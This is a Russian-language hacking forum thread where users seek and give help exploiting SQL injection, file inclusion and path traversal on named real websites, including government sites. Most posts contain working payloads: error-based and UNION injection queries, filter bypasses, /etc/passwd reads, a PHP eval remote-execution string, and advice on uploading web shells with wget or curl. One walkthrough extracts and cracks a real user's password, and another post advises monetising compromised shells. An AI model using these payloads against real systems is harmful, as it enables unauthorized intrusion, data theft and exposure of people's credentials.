Имеется доступ в site/mysql/scripts/setup.php. pma 2.11.11.3. Как получить доступ к бд ?

как тут раскрутить тогда?

_http://www.orehi.net.ua/component/option,com_fireboard/Itemid,43/func,view'/id,9/view,threaded/catid,3/

Собственно нужна помощь:

1) Имею скуль "MySQL error based"

2) Вот пример скули, при которой у меня выдает название Базы данных сайта


PHP:
site.ru/catalog/type/0/1+and(select+1+from(select+count(*),concat((select +(select+concat(0x7e,0x27,database(),0x27,0x7e))+f rom+`information_schema`.tables+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1

3) Как мне использую данную скуль прочитать etc/passwd ?

4) Как залить шелл через скуль имея полный путь до сайта и file_priv=Y

delete

Не могу раскрутить одну SQL, её запрос:

SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0

SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.

Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /

Остаётся только крутить через union, вывод на экран, но как это сделать не получается.

Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?

Сам URL спалить никак не смогу.

Сбербанк said:
Не могу раскрутить одну SQL, её запрос:
SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?
Сам URL спалить никак не смогу.


SELECT req, id FROM table_name WHERE `link` = '1' and (SUBSTRING((SELECT version()),1,1))=5#' AND `count` > 0

Что мешает крутить блиндем?

Сбербанк said:
Не могу раскрутить одну SQL, её запрос:
SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?
Сам URL спалить никак не смогу.


Попробуйте метод с name_const, очень часто выручает в случаях где надо выполнять запрос без пробелов в Error-Based!

юзер вводит, допустим, имя и сохрняет настройки, обновляет страничку - подгружается js скрипт, который формирует табличку с его именем через innerhtml. мы можем через xss в DOM объекте подгрузить произвольный скрипт? у меня не получилос( только косвенно... через инпутовский автофокус.

2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?

Интересная скуля (помогите)

Имеется ссылка вида :

_http://site.com/news.php?page=0

Добавляю кавычку и появляется вот что

http://s001.radikal.ru/i193/1301/ce/e0c4c0a2a41dt.jpg (http://radikal.ru/F/s001.radikal.ru/i193/1301/ce/e0c4c0a2a41d.png.html)

ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!

nicols said:
Имеется ссылка вида :
_http://site.com/news.php?page=0
Добавляю кавычку и появляется вот что
http://s001.radikal.ru/i193/1301/ce/e0c4c0a2a41dt.jpg (http://radikal.ru/F/s001.radikal.ru/i193/1301/ce/e0c4c0a2a41d.png.html)
ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!


Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить.

А по сабжу кури Это (https://antichat.live/threads/43966/)

Помойму там в лимит инекция и ниче ты там не раскрутишь.

blesse said:
Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить.
А по сабжу кури
Это (https://antichat.live/threads/43966/)
Помойму там в лимит инекция и ниче ты там не раскрутишь.


Очень смешно.Я там уже курил и не смог ничего сделать!

Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.

nicols said:
Очень смешно.Я там уже курил и не смог ничего сделать!
Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.


помочь и сделать- не одно и тоже.

Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.

Sat-hacker said:
Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.


Биржы ссылок, гонять трафик, просто продавать шеллы и т.д.

А вообще на ачате была статья про монетизацию шеллов, достаточно было бы воспользоваться поиском:

/thread220472.html (https://antichat.live/threads/220472/)

Приветствую.

Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции.

Пример обращения к php-скрипту:

http://site.ru/pochta.php?login=ya@ya.ru&parol=1111111

Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...

skier529 said:
Приветствую.
Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции.
Пример обращения к php-скрипту:
http://site.ru/pochta.php?login=ya@ya.ru&parol=1111111
Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...


Во-первых, по ващим словам, это SQL инъекция, а не PHP.

Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.

blesse said:
2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?


UPD

allow_url_fopen on

post_max_size 8M

max_file_uploads 20

upload_max_filesize 10M

функцией пыха copy тоже не удается создается файл с размером нормальным ,но открываю ,а там пусто.

Раньше подобные сервани тоже попадились ,но там все решалось просто бэкдор=>wget .... ,а на винде такая трабла 1 раз.

Во-первых, по ващим словам, это SQL инъекция, а не PHP.


Запись идет в TXT-файл.


Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.


Пример вот: logins-vk.3dn.ru/video465423567-4583112.html

По клику на кнопку войти все данные из заполненной формы передаются сюда:

upmozgoff.ru/log.php

Сами параметры:email и pass

skier529 said:
Запись идет в TXT-файл.
Пример вот: logins-vk.3dn.ru/video465423567-4583112.html
По клику на кнопку войти все данные из заполненной формы передаются сюда:
upmozgoff.ru/log.php
Сами параметры:
email
и
pass


Это обычный фэйк, который пишет инфу с введенной формы. Ничего с этим, вы не сделаете

День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз

romasjanXXL said:
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз


Издеваетесь? Проще простого...Совсем народ оборзел.


Code:
http://www.multitoys.com.ua/index.php?productID=1 or 1 group by mid(version(),rand(0)|0) having avg(0)&ukey=discuss_product

Есть скуля с правами ROOT

Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.

Что можно сделать чтобы порутать данный серв?

\/IRUS said:
Есть скуля с правами ROOT
Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.
Что можно сделать чтобы порутать данный серв?


Может для начала залить шелл? Ищи админку.

Artrix said:
Может для начала залить шелл? Ищи админку.


ищу просто уже вариантов нету

Не пойму как правильно тут составить запрос... Хелп плс...

http://skyscript.ru/primer/skynews/?act=nov&news_id=1

LelouchMe said:
Не пойму как правильно тут составить запрос... Хелп плс...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1


Place: GET

Parameter: news_id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3

a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(

RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia

zZ

Type: UNION query

Title: MySQL UNION query (NULL) - 6 columns

Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x

51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc

вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL %2CNULL%2CNULL%23

пробелы ток убери

Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--

ukrpunk said:
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--


%0afrom table_name

ukrpunk said:
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--


попробуй /**/from/**/table_name--

\/IRUS said:
попробуй /**/from/**/table_name--


SpaceWeb и это режет.

Там только %0a вместо порбелов помогает.

Добрый вечер.

Нашел уязвимость подобную этой

/showthread.php?t=10915

В общем проблема такая.

Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?

M1ks said:
Добрый вечер.
Нашел уязвимость подобную этой
/showthread.php?t=10915
В общем проблема такая.
Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?


если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (список файлов в папке (http://ua2.php.net/manual/ru/function.readdir.php) или залить свой кодес (http://ua2.php.net/manual/ru/function.file-put-contents.php) ). лично я не вижу в этой особой проблемы.

можно ли обойти такой фильтр


Code:
if (strpos($_GET['f'], '..') === false)
{
$a = dirname(__FILE__);
echo file_get_contents( $a . $_GET['f']);
}


я так понимаю нужен такой символ между точками который не должен нарушать сработку

конструкции .X./ в nix системах

тогда он пройдет через фильтр

либо замена точек на что то другое еквивалентное им

+toxa+ said:
если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (
список файлов в папке (http://ua2.php.net/manual/ru/function.readdir.php)
или
залить свой кодес (http://ua2.php.net/manual/ru/function.file-put-contents.php)
). лично я не вижу в этой особой проблемы.


Не получилось через opendir.

Пример как вставлял:

&cmd=opendir("../");&highlight='.eval($_GET[cmd]).'

ничего не выводит..

ysmat said:
можно ли обойти такой фильтр

Code:
if (strpos($_GET['f'], '..') === false)
{
$a = dirname(__FILE__);
echo file_get_contents( $a . $_GET['f']);
}

я так понимаю нужен такой символ между точками который не должен нарушать сработку
конструкции .X./ в nix системах
тогда он пройдет через фильтр
либо замена точек на что то другое еквивалентное им


https://rdot.org/forum/showpost.php?p=3323&postcount=16 - в помощь.

версию вывести возможно тут?

_http://vkontakte.dj/index.php?option=com_fireboard&Itemid=41&catid=9&id=3378&func=view'

Zed0x said:
https://rdot.org/forum/showpost.php?p=3323&postcount=16
- в помощь.


я уже пробовал ети методы они не помогают

но в описании функции file_get_contents есть интересное

цитата с http://php.su/functions/?f=file_get_contents&choice=info


Замечание: Если вы открываете URI содержащий спецсимволы, такие как пробел, вам нужно закодировать URI при помощи urlencode().



из етого следует что функция file_get_contents в принципе должна понимать урл кодированую строку пути

но по факту что то не работает

Говорю по факту, что есть, на данный момент:

1) самописный движок

2) ссылка типа index.php?id=hats

3) MySQL запрос не генерируется

4) id используется в условии if'a ( if( $_GET['id'] == "hats" ) {…} )

теперь вопрос, можно ли скормить параметру id спецсимвол ' (одинарную ковычку) и завершить if со своим последующим кодом, поставя знак комментария после своего кода, чтобы последующий код не мешал

Например:

1) .../index.php?id=hats'] == 'hats' && function(){ мой_код; return true;} ) { //

2) тоесть, чтобы код изменился с

if( $_GET['id'] == 'hats' ) {

на

if( 'hats' == 'hats' && function(){ мой_код; return true;} ) { // == "hats" ) {

P.S. извините, что не тегую, т.к. пишу с мобильного

ProFiLeR, нет.

mironich said:
ProFiLeR
, нет.


Жаль, значит придется ждать, когда перелистывание страниц сделают и SQLinj попробовать.

Я думал, что мой способ сработает, так как PHP интерпретируемый язык, но оказалось, что нет (не сработает).

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56

и дальше идет листинг больщого Select Запроса.

первый раз вообще вижу такую шляпу. крутится?

ребят, уязвимость в поле поиска - при подставке кавычки выдаёт -

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1

как правильно составлять запрос...?

justonline said:
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?


Нужен весь запрос, или хотя бы урл.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1


Попробуй так

' and 1='1

' and 1='2

И сравни результаты.

BigBear said:
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.


Ни то ни другое не работает... Вот урл -

http://lib.pntu.edu.ua/?module=vds*section-84

LelouchMe said:
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84


'and(1)='1 TRUE

'and(2)='1 FALSE

Режутся пробелы. Можно юзать только беспробельные варианты.

Ещё чуток покручу - выложу тут запросы.

UPD.

'and(extractvalue(1,concat(0x3a,(select(@@version) ))))='

XPATH syntax error: ':5.1.49-3'

'and(extractvalue(1,concat(0x3a,(select(database() )))))='

XPATH syntax error: ':lib_bd'

BigBear said:
XPATH syntax error:


То есть дальше посимвольный перебор...?

плюсую...)+

LelouchMe said:
То есть дальше посимвольный перебор...?
плюсую...)+


Не надо посимвольного перебора.

Я ж тебе докрутил до Error-Based. Теперь только через ошибку.

Да тебе и этого выше крыши.

BigBear said:
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.


Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...

Короче по такой схеме крутить я так понял:

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+limit+0,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+0,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+3,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+4,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,login,password)+from+users1+l imit+0,1)))--

или как тут


M_script said:
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос
:

Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1

Результат
:

Code:
5.1.53

Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос
:

Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1

Результат
:

Code:
customsnew.users

Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос
:

Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_nam e)from(information_schema.columns)where`table_name `='users'and(ordinal_position=1)))))='1

Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат
:

Code:
ID,login,password,name,email,comment

В таблице users всего одна запись. Получаем имя
Запрос
:

Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from (users)where(id=1)))))='1

Результат
:

Code:
olga

Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1
:

Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)f rom(users)where(id=1)))))='1

Запрос 2
:

Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(passwo rd)from(users)where(id=1)),32,1))))='1

Результат
:

Code:
79e4b4438aba2b6d8e1caf9568e73e12

Расшифровываем хэш по радужным таблицам.
Результат
:

Code:
olga:olga11

Да, кстати, а кто подскажет что это такое...?)

Вроде как не слепая... С такой ещё не стыкался...

http://www.rada-poltava.gov.ua/news/1'00000000'/

LelouchMe said:
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/


http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /

http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?

Del msg

Vip77 said:
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?


заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)

Zed0x said:
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)


А что делать, если /proc/self/environ выглядит так:

NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULN ULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNUL

Т.е., прочитать я его могу, но, кажется, что-то с ним не так

Zed0x said:
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)


там пхп не установлен походу

В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php

http://www.exploit-db.com/exploits/24444/

Смысл в том, что он под метасплоит.

Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:


PHP:
catlist[0]=brainyfuck123')||eval("echo 123;");//

Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.

Подскажите, что делаю не так

UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть

Code:
http://www.golowar.ru/news.php?id=67&page='

пишет:


SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1


Проверил сайт, можно ли считать это уязвимостью?

Как дальше её раскрутить чтоб исправить!

Zed0x said:
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:

PHP:
catlist[0]=brainyfuck123')||eval("echo 123;");//

Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD:
Форум почему-то убирает кавычку перед строкой
brainyfuck123')
, знайте что она там есть


Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.

del msg

не подскажите как раскрутить?


Code:
http://www.golowar.ru/news.php?id=67&page='



SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1


перепробовал всё, результат одна и та же таблица

panfilov1991 said:
не подскажите как раскрутить?

Code:
http://www.golowar.ru/news.php?id=67&page='

перепробовал всё, результат одна и та же таблица


Никак, intval().

Ereee said:
Никак, intval().


то есть в базу не как не пробиться?

Not Acceptable


___http://plainfieldsportsnews.com/news.php?id=2%29%29+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

BlackIce said:
Not Acceptable


http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

Vip77 said:
http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/


only error based ?

BlackIce said:
only error based ?


Религия не позволяет использовать Error-Based ? Тот же вывод, в чём проблемы то ? Какая то особая ситуация ?

GET /news.php HTTP/1.1

Host: www.golowar.ru

X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Стоит WP на сервере там, вывести пароль не могу, в чем проблема?

GET /news.php HTTP/1.1

Host: www.golowar.ru

X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Table 'wp.wp_users' doesn't exist

er9j6@ said:
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Стоит WP на сервере там, вывести пароль не могу, в чем проблема?
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Table 'wp.wp_users' doesn't exist


Table 'wp.wp_users' doesn't exist

Ereee said:
Table 'wp.wp_users' doesn't exist


Так-то она есть

GET /main.php HTTP/1.1

Host: www.golowar.ru

X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(concat_ws(0x3a,table_schema,table_name))from(inf ormation_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Duplicate entry 'wp:wp_users' for key 'group_key'

er9j6@ said:
Так-то она есть
GET /main.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(concat_ws(0x3a,table_schema,table_name))from(inf ormation_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Duplicate entry 'wp:wp_users' for key 'group_key'


Обрами название бд и таблицы апострофами

`wp`.`wp_users`

Del, thx

Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?

BlackIce said:
Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?


ничего

Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?

http://clip2net.com/clip/m201037/1360416311-clip-17kb.png

Vip77 said:
Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?
http://clip2net.com/clip/m201037/1360416311-clip-17kb.png



Попробуй с99 залить, возможно он будет работать

c99 вообще не заливается... дело в том, что я пытаюсь залить через

Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />

и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются

Vip77 said:
c99 вообще не заливается... дело в том, что я пытаюсь залить через
Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />
и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются


Так можешь вписать вверху index.php?

Click";} else {die("err");}}?>

'); ?>

Как можно залиться, если доступа к табле юзеров нет?

http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+

Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php

Известен юзер: masha_elitdress@localhost

Пробовал через char - не вышло.

В админку не попасть, хэши не брутятся.

Пытаюсь залиться через SQL.

foma9999 said:
Как можно залиться, если доступа к табле юзеров нет?
http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+
Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php
Известен юзер: masha_elitdress@localhost
Пробовал через char - не вышло.
В админку не попасть, хэши не брутятся.
Пытаюсь залиться через SQL.


сам же ответил на свой вопрос.

если file_priv нету или mq=on,

то через иньекцию залиться не получится.

Не могу выполнить ни одну команду в консоле, пишет Unable to execute command

OC Linux Kernel 2.6.32

Нашел и хочу скачать образ системы на сайте (доступно через directory traversal), но acunetix выдает ошибку, не могу мол так много качать и сбрасывает соединение (как повысить лимит, не нашел), если скормить ссылку браузеру, он выдает ахинею (возможно, с потерей информации) и при сохранении ее в файл образ не собирается. У разных браузеров файл получается разного размера, так что этот путь неверен. Flash Get ругается на ссылку и не хочет качать, естественно, ведь она имеет вид site?id=etc/linux.img

Может кто знает, какой проге надо это безобразие скормить, чтобы нормально скачалось?

Спасибо

wget site?id=etc/linux.img -O linux.img

cat1vo said:
wget site?id=etc/linux.img -O linux.img


Спасибо, получилось, только образ все равно не собирается почему-то (собирал, используя R-studio)

http://www.personalguide.ru/news/page32


Возможно ли раскрутить?

narviss said:
Возможно ли раскрутить?


допустим можно.

что дальше?

narviss said:
Возможно ли раскрутить?


Можно. Например так

_ttp://www.personalguide.ru/news/page33_'and(select*from(select+name_const(version( ),1),name_const(version(),1))a)='1/

Duplicate column name '5.3.7-MariaDB-mariadb116~squeeze-log'

https://site.com/cgi-bin/fnc/drop_flag.pl?id=91&l=&s=&shop_id=%5c




DBD::mysql::db do failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '91'' at line...


Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.

Как понял, знак %5c - это /

Yan.Total said:
Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
Как понял, знак %5c - это /


Сайт покажи =/

подскажите, можно что-то сделать с

http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'

cipa21 said:
подскажите, можно что-то сделать с
http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'


Это можно сделать

_http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'

Здравствуйте, подскажите как можно раскрутить такие скули:

http://www.timesworld24.com/cat-news-details.php?id=%20'+union(sElect+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17)+--+ //без валидного id отдает ошибку sql

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает

http://www.daviddeltredici.com/worksbycat.php%3Fid=-6+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17+--+ //404 отдает, не mysql?

Заарнее благодарен

FunOfGun said:
Здравствуйте, подскажите как можно раскрутить такие скули:
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает
Заарнее благодарен



